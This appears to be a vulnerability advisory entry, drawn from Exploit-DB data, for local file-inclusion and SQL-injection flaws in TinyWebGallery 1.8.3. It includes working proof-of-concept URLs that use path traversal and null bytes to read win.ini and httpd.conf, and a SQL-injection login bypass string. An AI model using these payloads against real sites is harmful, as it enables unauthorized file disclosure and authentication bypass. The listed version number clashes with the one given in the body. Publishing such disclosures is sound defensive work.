TinyWebGallery Local File Inclusion and SQL Injection Vulnerabilities

vendor:

TinyWebGallery

by:

7.5

CVSS

HIGH

Local file-include and SQL-injection vulnerabilities

CWE

Product Name: TinyWebGallery

Affected Version From: 1.8.2003

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

TinyWebGallery Local File Inclusion and SQL Injection Vulnerabilities

An attacker can exploit these issues to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and view and execute arbitrary local files within the context of the webserver.

Mitigation:

Apply the latest security patches and updates from the vendor. Verify that input validation and sanitization are implemented properly.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/49393/info

TinyWebGallery is prone to multiple local file-include and SQL-injection vulnerabilities.

An attacker can exploit these issues to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and view and execute arbitrary local files within the context of the webserver.

TinyWebGallery 1.8.3 is vulnerable; other versions may also be affected. 

http://www.example.com/upload/tfu_213.swf?base=C:\windows\win.ini%00&lang=en
http://www.example.com/admin/upload/tfu_upload.php?workaround_dir=../../../../../../../../httpd.conf%00
http://www.example.com/admin/tfu_login.php?install_path=../../../../../../../../httpd.conf%00

http://www.example.com/admin/upload/tfu_213.swf =>>
=>> If login :
-> Auth ByPass =
-- user = ' or '=' or '
-- pass = ' or '=' or '